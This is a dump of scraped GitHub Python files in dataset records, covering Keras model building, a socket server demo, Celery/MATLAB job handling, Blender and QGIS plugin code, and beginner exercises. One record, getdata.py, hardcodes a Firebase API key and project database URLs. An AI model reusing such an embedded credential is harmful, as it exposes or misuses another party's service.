model_name='efficientnetv2-s',\r\n weights=None,\r\n input_shape=None,\r\n include_top=True,\r\n dropout_rate=None,\r\n pooling=True,\r\n num_class=1000):\r\n model = EffNetV2Model(model_name=model_name,include_top=include_top,pooling=pooling)\r\n if not input_shape:\r\n size = model.cfg.eval.isize\r\n input_shape = (size, size, 3)\r\n x = tf.keras.Input(input_shape)\r\n output = model.call(x, training=None)\r\n\r\n if pooling and not include_top and num_class:\r\n if dropout_rate:\r\n output = tf.keras.layers.Dropout(dropout_rate)(output)\r\n output = tf.keras.layers.Dense(num_class)(output)\r\n\r\n model = tf.keras.Model(inputs=x,outputs=output)\r\n\r\n if weights:\r\n if os.path.exists(weights):\r\n model.load_weights(weights,by_name=True,skip_mismatch=True)\r\n else:\r\n raise ValueError('invalid weights path: {}!'.format(weights))\r\n\r\n return model","repo_name":"cersar/efficientnetv2","sub_path":"efficientnetv2/efficientnetv2.py","file_name":"efficientnetv2.py","file_ext":"py","file_size_in_byte":1065,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"20833248864","text":"#-*-coding:utf-8-*-\n#/usr/bin/env python\n__author__ = \"Allan\"\n\nimport socketserver\n\nclass MyServer(socketserver.BaseRequestHandler):\n\n def handle(self):\n # print 
self.request,self.client_address,self.server\n conn = self.request\n conn.sendall(bytes('Welcome to call 10086,please input 1xxx to customer service.',encoding='utf-8'))\n Flag = True\n while Flag:\n data_bytes = conn.recv(1024)\n data = str(data_bytes,encoding='utf-8')\n if data == 'exit':\n Flag = False\n elif data == '0':\n conn.sendall(bytes('This communication will be recorded',encoding='utf-8'))\n else:\n conn.sendall(bytes('Please re-input.',encoding='utf-8'))\n\n\nif __name__ == '__main__':\n #socket+select+多线程\n #IP端口,类名\n #Myserver==>RequestHandlerClass\n #obj = self.RequestHandlerClass\n #obj.handle()\n #ThreadingTCPServer.init =>TCPServer.init()\n #1.server对象\n # self.server_address ('127.0.0.1',8009)\n # self.RequestHandlerClass (MyServer)\n # self.socket 创建服务端socket对象\n server = socketserver.ThreadingTCPServer(('127.0.0.1',8009),MyServer)\n # 1.server对象的server_forever()\n server.serve_forever()\n\n","repo_name":"nurruden/training","sub_path":"day10/socket_server_thread.py","file_name":"socket_server_thread.py","file_ext":"py","file_size_in_byte":1317,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"19687125943","text":"import pyrebase\nconfig = { \n \"apiKey\": \"AIzaSyBL9p5Gp7hkprcNy_Bj9TGZFQnJW8YaM3Y\",\n \"authDomain\": \"finalproject-db669.firebaseapp.com\",\n \"databaseURL\": \"https://finalproject-db669-default-rtdb.firebaseio.com\",\n \"storageBucket\": \"finalproject-db669.appspot.com\"\n}\nfirebase = pyrebase.initialize_app(config)\ndb = firebase.database()\nstorage = firebase.storage()\ndb.child(\"Global_variable\").child(\"face\").child(\"canceladdface\").set(\"False\")\n# users = db.child(\"users\").get()\n# data = db.child(\"History\").child(\"xin chao\").get()\n# db.child(\"History\").child(\"12//2//3\").set(\"xxxxx\")\n# print(data.val())\n# # print(type(users.val()))\n# Dict = {}\n# for user in users.each():\n# Dict[user.val()['id']] = [user.val()['idcard'],user.val()['lablename']]\n# # print(Dict)\n\n# # for key, value in Dict.items():\n# # print(key, ' : ', value)\n# id = '320097137727'\n# index = \"\"\n# lists = list(Dict.values())\n# print(lists)\n# for x in lists:\n# if id in x:\n# print(\"ok\")\n# # if id in Dict.values():\n# # Dict\n# # else:\n# # print(\"àasfasfsaf\")\n\n\"\"\" code get url của 1 file trên firebase\n url = storage.child(\"acv\")\nlocalpath = \"/home/pi/Desktop/a.jpg\"\ncloud = \"image/pi.jpg\"\n# firebase.storage().child(cloud).put(localpath)\nprint(type(storage.child(\"PicAvt/CJjR87lyjdOvnxMObDvuqtzyeXx2.jpg\").get_url(None))) \"\"\"\n\n\n\"\"\" Code get tất cả các giá trị rfid, lable, active của các user cho vào 1 dictionary\nRefUsers = db.child(\"users\").get()\nDictValAuthUser = {}\nfor user in RefUsers.each():\n DictValAuthUser[user.val()['id']] = [user.val()['idcard'],user.val()['lablename'], user.val()['active']]\n\nprint(DictValAuthUser) \"\"\"\n\n\"\"\" code xóa lablename trong file đã mã hóa \nls = []\nfor index, val in enumerate(encoded_data['names']):\n\tif val == \"thanh\":\n\t\tls.append(index)\nprint(ls)\nif len(ls):\n\tdel encoded_data['encodings'][ls[0]:ls[-1]+1]\n\tdel encoded_data['names'][ls[0]:ls[-1]+1]\n\nwith open(\"Mahoa.pickle\", 'wb') as file:\n\tfile.write(pickle.dumps(encoded_data)) \"\"\"\n","repo_name":"thanh182790/DATN_TEST","sub_path":"getdata.py","file_name":"getdata.py","file_ext":"py","file_size_in_byte":1998,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} 
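# A variant of the pickle label-removal snippet at the end of the record above that
# does not assume the matching indices are contiguous (sketch only; encoded_data,
# the "thanh" label and "Mahoa.pickle" are taken from that snippet):
#   import pickle
#   keep = [i for i, name in enumerate(encoded_data['names']) if name != "thanh"]
#   encoded_data['encodings'] = [encoded_data['encodings'][i] for i in keep]
#   encoded_data['names'] = [encoded_data['names'][i] for i in keep]
#   with open("Mahoa.pickle", 'wb') as file:
#       file.write(pickle.dumps(encoded_data))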
+{"seq_id":"42036086927","text":"from celery.task import task\nfrom celery.task.sets import subtask\nfrom subprocess import check_call\nimport glob, shutil \nimport os,ast\n\n@task()\ndef initEnKFrun(callback=None,basedir=None,site=None,siteparam=None):\n if not site:\n raise \"site is a required parameter\"\n if siteparam:\n param = ast.literal_eval(siteparam)\n else:\n raise \"Parameters are required. Please submit Paramerers with task submission\"\n if not basedir:\n raise \"Basedir is required\"\n #Create working directory\n newDir = basedir + \"celery_data/\" + str(initEnKFrun.request.id)\n check_call([\"mkdir\",newDir])\n os.chdir(newDir)\n #copy matlab code to working directory\n codeDir =basedir + 'enfk_matlab/'\n for file in glob.glob(codeDir + '*'): \n shutil.copy(file, newDir) \n #check_call([\"cp\",\"-r\",codeDir + '*',newDir])\n #set inital Paramters files\n setup_param(newDir,param)\n if callback:\n result=subtask(callback).delay(task_id=str(initEnKFrun.request.id),wkdir=newDir)\n return {'task_id':result.task_id,'task_name':result.task_name}\n else:\n return newDir\n\n\n@task()\ndef runEnKF(task_id=None,wkdir=None):\n os.chdir(wkdir)\n check_call([\"/opt/matlab_R2012/bin/matlab\",\"-nodisplay\",\"-r\",\"try,EnKF, catch, end, quit\",\">\",\"Matlab_log.txt\"])\n #clean up output folder\n check_call([\"mkdir\",wkdir + '/matlab_code' ])\n for file in glob.glob(wkdir + '/*.m'):\n shutil.move(file, wkdir + '/matlab_code')\n for file in glob.glob(wkdir + '/*.txt'):\n if not os.path.basename(file)=='Matlab_log.txt':\n shutil.move(file, wkdir + '/matlab_code')\n for file in glob.glob(wkdir + '/*.csv'):\n shutil.move(file, wkdir + '/matlab_code')\n #zip all files\n check_call(['zip','-r','model_run_archive','.'])\n #scp to static server\n webloc =\"/static/queue/model/teco/\" + task_id\n check_call(['scp','-r', wkdir , \"mstacy@static.cybercommons.org:\" + webloc])\n #render results\n temp = \"
<html><h1>Result Files</h1><br><br>\"\n    http= \"http://static.cybercommons.org/queue/model/teco/\" + task_id \n    temp = temp + '<a href=\"model_run_archive.zip\">Download Model Results</a><br>'\n    temp = temp + \"<br><h1>EnKF Result Graphs</h1><br><br>\"\n    temp=temp + ' <b>Figure 1</b><br>'\n    temp=temp + ' <img alt=\"Figure 1\" src=\"' + http + '/figure1.jpg\"><br>'\n    #temp=temp + ' <img src=\"' + http + '/figure1.jpg\"><br>'\n    temp=temp + ' <b>Figure 2</b><br>'\n    temp=temp + ' <img alt=\"Figure 2\" src=\"' + http + '/figure2.jpg\"><br>'\n    #temp=temp + ' <img src=\"' + http + '/figure2.jpg\"><br>'\n    temp=temp + ' <b>Figure 4</b><br>'\n    temp=temp + ' <img alt=\"Figure 4\" src=\"' + http + '/figure4.jpg\"><br>'\n    #temp=temp + ' <img src=\"' + http + '/figure4.jpg\"><br>'\n    temp=temp + ' <b>Figure 5</b><br>'\n    temp=temp + ' <img alt=\"Figure 5\" src=\"' + http + '/figure5.jpg\"><br>'\n    #temp=temp + ' <img src=\"' + http + '/figure5.jpg\"><br>'\n    temp=temp + ' <b>Figure 7</b><br>'\n    temp=temp + ' <img alt=\"Figure 7\" src=\"' + http + '/figure7.jpg\"><br>'\n    #temp=temp + ' <img src=\"' + http + '/figure7.jpg\"><br>'\n    temp=temp + ' <b>Figure 8</b><br>'\n    temp=temp + ' <img alt=\"Figure 8\" src=\"' + http + '/figure8.jpg\"><br>'\n    #temp=temp + ' <img src=\"' + http + '/figure8.jpg\"><br>'\n    temp=temp + ' <b>Figure 9</b><br>'\n    temp=temp + ' <img alt=\"Figure 9\" src=\"' + http + '/figure9.jpg\"><br>'\n    #temp=temp + ' <img src=\"' + http + '/figure9.jpg\"><br>
'\n return temp\n\ndef setup_param(newDir, param):\n try:\n f1= open(newDir + '/param.m','w')\n tfile ='function x = param(parm)\\n% Initial parameters\\n'\n tfile=tfile + 'cmin = [' + str(param['cmin1']) + ' ' + str(param['cmin2']) + ' ' + str(param['cmin3']) + ' ' + str(param['cmin4']) + ' '\n tfile=tfile + str(param['cmin5']) + ' ' + str(param['cmin6']) + ' ' + str(param['cmin7']) + ' ' + str(param['cmin8']) + '];\\n'\n tfile=tfile + 'cmax = [' + str(param['cmax1']) + ' ' + str(param['cmax2']) + ' ' + str(param['cmax3']) + ' ' + str(param['cmax4']) + ' '\n tfile=tfile + str(param['cmax5']) + ' ' + str(param['cmax6']) + ' ' + str(param['cmax7']) + ' ' + str(param['cmax7']) + '];\\n' \n tfile=tfile + 'x0 = ['+ str(param['x1']) + ' ' + str(param['x2']) + ' ' + str(param['x3']) + ' ' + str(param['x4']) + ' ' + str(param['x5']) + ' '\n tfile=tfile + str(param['x6']) + ' ' + str(param['x7']) + ' ' + str(param['x8']) + '];\\n'\n tfile=tfile + 'c0 = ['+ str(param['c1']) + ' ' + str(param['c2']) + ' ' + str(param['c3']) + ' ' + str(param['c4']) + ' ' + str(param['c5']) + ' '\n tfile=tfile + str(param['c6']) + ' ' + str(param['c7']) + ' ' + str(param['c8']) + '];\\n'\n tfile=tfile + 'mscut = ' + str(param['mscut']) + ';\\n'\n tfile=tfile + 'b = ['+ str(param['b1']) + ' ' + str(param['b2']) + ' ' + str(param['b3']) + ' 0 0 0 0 0]\\n'\n tfile=tfile + 'A=[-1 0 0 0 0 0 0 0\\n'\n tfile=tfile + ' 0 -1 0 0 0 0 0 0\\n'\n tfile=tfile + ' 0 0 -1 0 0 0 0 0\\n'\n tfile=tfile + ' ' + str(param['A41']) + ' ' + str(param['A42']) + ' ' + '0 -1 0 0 0 0\\n'\n tfile=tfile + ' ' + str(param['A51']) + ' ' + str(param['A52']) + ' ' + '1 0 -1 0 0 0\\n'\n tfile=tfile + ' 0 0 0 ' + str(param['A64']) + ' ' + str(param['A65']) + ' ' + '-1 '+ str(param['A67']) + ' ' + str(param['A68']) + '\\n'\n tfile=tfile + ' 0 0 0 0 ' + str(param['A75']) + ' ' + str(param['A76']) + ' ' + '-1 0\\n'\n tfile=tfile + ' 0 0 0 0 0 '+ str(param['A86']) + ' ' + str(param['A87']) + ' ' + '-1];\\n'\n tfile = tfile + \"if strcmp(parm,'cmin')\\n\\tz = cmin;\\nend\\n\"\n tfile = tfile + \"if strcmp(parm,'cmax')\\n\\tz = cmax;\\nend\\n\"\n tfile = tfile + \"if strcmp(parm,'x0')\\n\\tz = x0;\\nend\\n\"\n tfile = tfile + \"if strcmp(parm,'c0')\\n\\tz = c0;\\nend\\n\"\n tfile = tfile + \"if strcmp(parm,'mscut')\\n\\tz = mscut;\\nend\\n\"\n tfile = tfile + \"if strcmp(parm,'b')\\n\\tz = b;\\nend\\n\"\n tfile = tfile + \"if strcmp(parm,'A')\\n\\tz = A;\\nend\\n\"\n tfile = tfile + \"x=z;\\nend\\n\"\n \n f1.write(tfile)\n f1.close()\n except Exception as inst:\n raise inst\n\n","repo_name":"ouinformatics/cybercomq","sub_path":"cybercomq/model/teco/enkf.py","file_name":"enkf.py","file_ext":"py","file_size_in_byte":7284,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"73357852212","text":"\"\"\"Makes a sweep directory for FabNESO.\"\"\"\n\nimport argparse\nfrom ast import literal_eval\nfrom pathlib import Path\n\nfrom .ensemble_tools import create_dict_sweep, create_dir_tree\n\n\ndef main() -> None:\n \"\"\"Entrypoint for script to make sweep directory.\"\"\"\n # Make the argument parser\n parser = argparse.ArgumentParser(\n description=\"Makes a sweep directory for FabNESO\",\n formatter_class=argparse.ArgumentDefaultsHelpFormatter,\n )\n parser.add_argument(\n \"--sweep_path\",\n help=\"The path to write the \",\n type=Path,\n default=Path(__file__).parent.parent / \"config_files\" / \"two_stream_ensemble\",\n )\n parser.add_argument(\n \"--n_dirs\",\n help=\"Number of divisions in grid for each 
parameter\",\n type=int,\n default=5,\n )\n parser.add_argument(\n \"--destructive\",\n \"-d\",\n help=\"Deletes the previous tree if it already exists\",\n action=\"store_true\",\n )\n parser.add_argument(\n \"--copy_dir\",\n help=\"Copy contents of this dir to the sweep dirs\",\n type=Path,\n default=Path(__file__).parent.parent / \"config_files\" / \"two_stream\",\n )\n parser.add_argument(\n \"--edit_file\",\n help=\"Template a parameter in this file\",\n default=\"conditions.xml\",\n )\n parser.add_argument(\n \"--para_to_template\",\n help=\"The parameter in the config file to template for the scan\",\n default=\"\",\n )\n parser.add_argument(\n \"--scan_min\", help=\"Lower limit of the parameter scan\", type=float, default=0\n )\n parser.add_argument(\n \"--scan_max\", help=\"Upper limit of the parameter scan\", type=float, default=0\n )\n parser.add_argument(\n \"--parameter_dict\",\n help=\"An input dict of the parameters to be scanned.\",\n default=\"\",\n )\n parser.add_argument(\"--dir_prefix\", help=\"Prefix to call output dir\", default=\"d\")\n args = parser.parse_args()\n\n if args.parameter_dict != \"\":\n # If this has been specified, we'll automatically create\n # the directory tree as a multidimensional scan of these points\n parameter_dict = literal_eval(args.parameter_dict)\n # Check we have made a dict\n if not isinstance(parameter_dict, dict):\n msg = \"Did not receive a dict as input for parameter_dict\"\n raise ValueError(msg)\n # Use the dict to create a sweep directory\n create_dict_sweep(\n sweep_path=args.sweep_path,\n n_dirs=args.n_dirs,\n destructive=args.destructive,\n copy_dir=args.copy_dir,\n edit_file=args.edit_file,\n parameter_dict=parameter_dict,\n )\n\n elif args.para_to_template != \"\":\n create_dir_tree(\n sweep_path=args.sweep_path,\n n_dirs=args.n_dirs,\n destructive=args.destructive,\n copy_dir=args.copy_dir,\n edit_file=args.edit_file,\n parameter_to_scan=args.para_to_template,\n scan_range=(args.scan_min, args.scan_max),\n outdir_prefix=args.dir_prefix,\n )\n else:\n msg = (\n \"Please either define a parameter_dict or chose a para_to_template\"\n \" for the sweep directory\"\n )\n raise ValueError(msg)\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"UCL/fabneso","sub_path":"FabNESO/make_sweep_dir.py","file_name":"make_sweep_dir.py","file_ext":"py","file_size_in_byte":3343,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"39521020403","text":"x = 0 \ny = 0 \nT =\"\"\n\nfor i in range(2000) :\n\tif abs(x) < L-1 and abs(y) < L-1:\n\t\t# The robot has not reached the edge\n\t\tr = randi(1,4)\n\t\tif r==1:\n\t\t\t# Hop North\n\t\t\ty = y + 2; T = T + 'NN' \n\t\telif r==2:\n\t\t\t# Hop East\n\t\t\tx = x + 2; T = T + 'EE' \n\t\telif r==3:\n\t\t\t# Hop South\n\t\t\ty = y-2; T = T + 'SS' \n\t\telse:\n\t\t\t# Hop West\n\t\t\tx = x-2; T = T + 'WW'\n\telse:\n\t\tbreak\n","repo_name":"aayush17002/DumpCode","sub_path":"Dump/robot.py","file_name":"robot.py","file_ext":"py","file_size_in_byte":360,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"3054374260","text":"bl_info = {\n \"name\": \"Rename Asist\",\n \"author\": \"BlenderBoi\",\n \"version\": (1, 0),\n \"blender\": (3, 1, 0),\n \"description\": \"\",\n \"wiki_url\": \"\",\n \"category\": \"Utility\",\n}\n\nimport bpy\nfrom . import Preferences\nfrom . import Panels\nfrom . 
import Operator\n\nmodules = [Panels, Preferences, Operator]\n\ndef register():\n\n for module in modules:\n module.register()\n\ndef unregister():\n\n for module in modules:\n module.unregister()\n\nif __name__ == \"__main__\":\n register()\n","repo_name":"BlenderBoi/Rename-Asist","sub_path":"__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":503,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"39202591745","text":"def say_hello(name):\n print(\"Hello \" + name)\n\ndef power(x, y):\n return x ** y\n\n\ndef fib(x):\n if x == 0: return 0\n if x == 1: return 1\n return fib(x - 1) + fib(x - 2)\n\n\narea_codes = {[418,581]:'Québec',\n 'Montréal': [438, 514],\n 'Banlieue': [450]}\n\ndef get_area_codes(region):\n if region in area_codes :\n return area_codes[region]\n return 'Unknown region'\n\ndef get_region(area_code):\n for k,v in area_codes.items():\n if area_code in v: return(k)\n return 'Unknown area code'\n\ndef words_average_size(text):\n size_sum = 0\n words = text.split()\n for word in words :\n size_sum += len(word)\n return size_sum / len(words)\n\ndef divide(x,y):\n try:\n return (x / y)\n except ZeroDivisionError:\n print('! Division par zéro !')\n return float(\"inf\")\n\ndef fizz_buzz():\n result = []\n for x in range(0, 101):\n if (x % 15 == 0):\n result.append(\"FizzBuzz\")\n elif(x % 3 == 0) :\n result.append(\"Fizz\")\n elif(x % 5 == 0):\n result.append(\"Buzz\")\n else:\n result.append(x)\n return result\n\ndef mine_sweeper(size, content):\n \n # Build grid\n grid = {}\n lines, columns = size\n index = 0\n for x in range(0, lines):\n for y in range(0, columns):\n grid[(x,y)] = content[index]\n index += 1\n\n # Compute neighbors\n for coordinates in grid:\n if(grid[coordinates] == \"*\"): continue\n x, y = coordinates\n neighbors = [(x - 1, y + 1), (x, y + 1), (x + 1, y + 1),\n (x - 1, y), (x + 1, y),\n (x - 1, y - 1), (x, y - 1), (x + 1, y - 1)]\n number_of_adjacent_mines = 0\n for neighbor in neighbors:\n if (neighbor in grid) and (grid[neighbor] == \"*\"):\n number_of_adjacent_mines += 1\n grid[coordinates] = number_of_adjacent_mines\n\n #Build display\n display = \"\"\n for x in range(0, lines):\n for y in range(0, columns):\n display += str(grid[(x,y)])\n display += \"\\n\"\n return display\n\n\nif __name__ == \"__main__\":\n say_hello(\"guys\")\n print(power(2, 3))\n print(get_area_codes('Montréal'))\n print(get_area_codes('New York'))\n print(get_region(438))\n print(get_region(123))\n print(words_average_size(\"ha ha\"))\n print(words_average_size(\"hi hello\"))\n print(divide(1,2))\n print(divide(1,0))\n print(fizz_buzz())\n print(mine_sweeper((3,3), \"*.......*\"))\n\n","repo_name":"tlsrc/python-training","sub_path":"module1.py","file_name":"module1.py","file_ext":"py","file_size_in_byte":2541,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"25449049282","text":"import cv2\nimport matplotlib.pyplot as plt\nimport numpy as np\nimg = cv2.imread('pygame/car2.png', cv2.IMREAD_UNCHANGED)\n\nscale_percent = 40 # percent of original size\nwidth = int(img.shape[1] * scale_percent / 100)\nheight = int(img.shape[0] * scale_percent / 100)\ndim = (width, height)\n \n# resize image\nresized = cv2.resize(img, dim, interpolation = cv2.INTER_AREA)\n\ncv2.imwrite('pygame/newcar2.png', 
resized)","repo_name":"kopmean/pygame","sub_path":"resize_img.py","file_name":"resize_img.py","file_ext":"py","file_size_in_byte":410,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"30237566781","text":"# import os\nimport os.path, math, ntpath, re\nimport processing\n\nfrom qgis.core import (\n QgsGeometry, QgsGeometryCollection,\n QgsPoint,\n QgsPolygon,\n QgsField,\n QgsFields,\n QgsMultiPoint,\n QgsFeature,\n QgsPointXY,\n QgsWkbTypes,\n QgsProject,\n QgsFeatureRequest,\n QgsVectorLayer,\n QgsDistanceArea,\n QgsUnitTypes,\n QgsVectorLayer,\n QgsCoordinateReferenceSystem,\n QgsCoordinateTransform,\n QgsCoordinateTransformContext,\n QgsSpatialIndex,\n QgsProcessing,\n QgsProcessingAlgorithm,\n QgsProcessingContext,\n QgsFeatureIterator,\n QgsProcessingUtils\n\n)\nfrom PyQt5.QtCore import *\n\ndef kmFormat(km):\n km_format = str(math.floor(km/1000)) + '+' + str(int(km%1000)).rjust(3,'0')\n return km_format\n\nclass Layer:\n def __init__(self, layer):\n self.layer = layer\n self.pt = QgsPoint()\n self.prefix = ''\n self.result_paths_and_prefix = []\n\n def getLayer(self):\n return self.layer\n\n # def setAttributes(self):\n def getPath(self):\n print(self.layer.source())\n return self.layer.source()\n\n\n def makeSpatialIndex(self):\n spIndex = QgsSpatialIndex()\n # for feat in km_inst.getFeatures():\n for feat in self.layer.getFeatures():\n spIndex.insertFeature(feat)\n return spIndex\n\n def czyPolygon(self):\n if self.layer.geometryType() == QgsWkbTypes.PolygonGeometry:\n polygon = True\n else:\n polygon = False\n # print(\"wkbtype: \" + str(self.layer.geometryType()))\n return polygon\n\n def makePrefix(self, prefix):\n self.prefix = prefix\n # def transformCRS(self):\n\n # def addResultPath(self, path):\n # self.result_paths.append(path)\n\n def addResultPathAndPrefix(self, path, prefix):\n self.result_paths_and_prefix.append([path, prefix])\n\n def getResultPathsAndPrefix(self):\n return self.result_paths_and_prefix\n\n # def getResultPaths(self):\n # return self.result_paths\n\n def getPrefix(self):\n return self.prefix\n\n def setPrefix(self, prefix):\n self.prefix = prefix\n\n def distansStrona(self, os):\n self.error = 0\n self.layer.startEditing()\n line_feats = [ feat for feat in os.getLayer().getFeatures() ] \n layer_feats = [ feat for feat in self.layer.getFeatures() ]\n for feat in layer_feats:\n if feat.geometry() is not None:\n dist_od_osi = 999999999\n pos = ''\n pt = QgsPoint()\n\n for line_feat in line_feats: #----->zabezpieczyć na wypadek pustej geometrii!!!<------\n if line_feat.geometry() is not None:\n feat_to_point_geom_temp = line_feat.geometry().nearestPoint(feat.geometry()) #najblizszy punkt na osi\n feat_to_point_geom_feature_temp = feat.geometry().nearestPoint(line_feat.geometry()) #najblizszy punkt na obiekcie\n dist_od_osi_temp = QgsGeometry.distance(feat_to_point_geom_temp, feat.geometry())\n if dist_od_osi_temp < dist_od_osi:\n pt = feat_to_point_geom_feature_temp.asPoint()\n\n dist_od_osi = round(dist_od_osi_temp,1)\n\n point_in_line = line_feat.geometry().closestSegmentWithContext(pt)[3] #numer 3 pokazuje która strona, numer 1 daje punkt\n\n if point_in_line > 0:\n pos = 'prawa'\n elif point_in_line < 0:\n pos = 'lewa'\n else:\n pos = 'na osi'\n if line_feat.geometry().crosses(feat.geometry()) or line_feat.geometry().intersects(feat.geometry()):\n pos = 'na osi'\n else:\n self.error = 3 #pusta geometria osi\n else:\n self.error = 4 #pusta geometrai w warstwie przecinanej\n self.pt = pt\n 
idx_dist_od_osi = self.layer.fields().lookupField('dist_od_osi')\n # print( self.layer.fields().names())\n feat[idx_dist_od_osi] = round(float(dist_od_osi),3)\n\n ###################\n idx_strona = self.layer.fields().lookupField('strona')\n feat[idx_strona] = pos\n\n self.layer.updateFeature( feat )\n #############\n self.layer.commitChanges()\n return self.error\n\n def przeciecia(self, km, os, pas, km_checked, os_checked, pas_checked, kmfield):\n self.layer.startEditing()\n crs92 = \"EPSG:2180\"\n spIndex = km.makeSpatialIndex()\n layer_feats = [ feat for feat in self.layer.getFeatures() ]\n i=0\n for feat in layer_feats:\n # dist_od_osi = 999999999\n if pas_checked:\n obszar_fts = pas.getLayer().getFeatures()\n else:\n obszar_fts = QgsFeatureIterator()\n\n if os_checked:\n os_fts = os.getLayer().getFeatures()\n else:\n os_fts = []\n\n pos_zakres = 'poza zakresem inwestycji'\n\n geoms = QgsGeometry.fromWkt('GEOMETRYCOLLECTION()')\n for feature in os_fts:\n geom = feature.geometry()\n # print(geom)\n geoms = geoms.combine(geom)\n\n dist_to_pas = []\n area = 0\n\n #tworzy nową warstwę na przecięcia\n przeciecia_fts = QgsVectorLayer(QgsWkbTypes.displayString(QgsWkbTypes.Point)+\"?crs=\"+crs92, \"przecięcia\", \"memory\")\n przeciecia_fts.startEditing()\n fieldid = QgsField(\"id\", QVariant.Int)\n fieldids = QgsFields()\n fieldids.append(fieldid)\n przeciecia_fts.addAttribute(fieldid)\n\n intersections_fts = []\n #pętla po obszarach\n if not obszar_fts.isValid():\n feat_ring = feat.geometry().convertToType(1,False) #wybranie granic poligonów inwentaryzacji w celu przecięć\n\n if not feat.geometry().intersection(geoms.buffer(0.01,50)).isEmpty():\n intersections_fts.append(feat.geometry().intersection(geoms.buffer(0.01,50))) #dodanie oryginalnych obiektów do listy z przecięciami jeśli nie analizujemy pasa\n #dodanie oryginalnych obiektów do listy z przecięciami jeśli nie analizujemy pasa\n przeciecia_pts = feat_ring.intersection(geoms.convertToType(5,False)) #uzyskanie punktów przecięcia\n\n if not (przeciecia_pts.isEmpty()):\n points = przeciecia_pts.asMultiPoint() #################### błąd typu osi\n for point in points:\n i+=1\n new_feature = QgsFeature(fieldids)\n new_feature.setGeometry(QgsPoint(point))\n new_feature.setAttribute(0,i)\n przeciecia_fts.addFeature(new_feature)\n else:\n new_feature = QgsFeature(fieldids)\n if km_checked and os_checked:\n new_feature.setGeometry(QgsPoint(feat.geometry().nearestPoint(geoms).asPoint()))\n new_feature.setAttribute(0,i)\n przeciecia_fts.addFeature(new_feature)\n\n else:\n if not obszar_ft.geometry().isNull():\n new_feature.setGeometry(QgsPoint(feat.geometry().nearestPoint(obszar_ft.geometry().buffer(0.01,50)).asPoint()))\n new_feature.setAttribute(0,i)\n przeciecia_fts.addFeature(new_feature)\n\n\n for obszar_ft in obszar_fts:\n if obszar_ft.geometry().buffer(0.01,50).crosses(feat.geometry()) or obszar_ft.geometry().buffer(0.01,50).intersects(feat.geometry()) or obszar_ft.geometry().buffer(0.01,50).contains(feat.geometry()):\n pos_zakres = 'w zakresie inwestycji' #modyfikacja pola pozycja\n dist_to_pas.append(float(QgsGeometry.distance(obszar_ft.geometry().buffer(0.01,50),feat.geometry()))) #dodanie do listy odległości w celu wybrania najmniejszej\n\n if self.czyPolygon():\n feat_ring = feat.geometry().convertToType(1,False) #wybranie granic poligonów inwentaryzacji w celu przecięć\n przeciecia_pts = QgsGeometry() #warstwa z punktami przecięcia\n if pas_checked:\n przeciecia = feat.geometry().intersection(obszar_ft.geometry().buffer(0.01,50))\n 
area += przeciecia.area() #dodanie do liczby z powierzchni przecięcia danego fragmentu\n obszar_ring = obszar_ft.geometry().buffer(0.01,50).convertToType(1,False)\n\n if not przeciecia.isEmpty():\n intersections_fts.append(przeciecia) #dodanie obiektów do listy z przecięciami\n\n przeciecia_pts = feat_ring.intersection(obszar_ring) #uzyskanie punktów przecięcia\n else:\n intersections_fts.append(feat.geometry().buffer(0.01,50)) #dodanie oryginalnych obiektów do listy z przecięciami jeśli nie analizujemy pasa\n przeciecia_pts = feat_ring.intersection(geoms.geometry().buffer(0.01,50))#.buffer(0.01,50).convertToType(1,False)) #uzyskanie punktów przecięcia\n ############### doddć przecięcia z osią!!!!\n # przeciecia_pts = feat_ring.intersection(os) #uzyskanie punktów przecięcia\n\n if not (przeciecia_pts.isEmpty()):\n points = przeciecia_pts.asMultiPoint()\n for point in points:\n i+=1\n new_feature = QgsFeature(fieldids)\n new_feature.setGeometry(QgsPoint(point))\n new_feature.setAttribute(0,i)\n przeciecia_fts.addFeature(new_feature)\n else:\n new_feature = QgsFeature(fieldids)\n if km_checked and os_checked:\n new_feature.setGeometry(QgsPoint(feat.geometry().nearestPoint(geoms).asPoint()))\n new_feature.setAttribute(0,i)\n przeciecia_fts.addFeature(new_feature)\n\n else:\n if not obszar_ft.geometry().isNull():\n new_feature.setGeometry(QgsPoint(feat.geometry().nearestPoint(obszar_ft.geometry().buffer(0.01,50)).asPoint()))\n new_feature.setAttribute(0,i)\n przeciecia_fts.addFeature(new_feature)\n\n\n\n przeciecia_fts.commitChanges()\n\n przeciecia_km = [[0]]\n przeciecia_km[0].clear()\n przeciecie_km_str = ''\n\n #print(intersections_fts)\n\n if self.czyPolygon():\n idx_powierzchnia = self.layer.fields().lookupField('powierzchnia')\n feat[idx_powierzchnia] = round(feat.geometry().area(),3)\n if pas_checked:\n idx_powierzchnia_przec = self.layer.fields().lookupField('pow_prze')\n feat[idx_powierzchnia_przec] = round(area,3)\n idx_procent = self.layer.fields().lookupField('procent')\n feat[idx_procent] = round(area*100/feat.geometry().area(),2)\n if km_checked and os_checked:\n if len(intersections_fts)>0:\n liczba_obszarow = 0\n for intersection in intersections_fts:\n if intersection.isMultipart()==True:\n # print('multi')\n for intersection_geom in intersection.asGeometryCollection():\n\n km_przeciec_obszaru = []\n for intersection_geom_pt in intersection_geom.asPolygon()[0]:\n nearestIds = spIndex.nearestNeighbor(intersection_geom_pt,1)\n km_przeciec_obszaru.append(km.getLayer().getFeature(nearestIds[0]).attributes()[kmfield])\n\n przeciecia_km.append([])\n przeciecia_km[liczba_obszarow].append(min(km_przeciec_obszaru))\n przeciecia_km[liczba_obszarow].append(max(km_przeciec_obszaru))\n\n #print(min(km_przeciec_obszaru))\n #print(max(km_przeciec_obszaru))\n\n for przeciecia_ft in 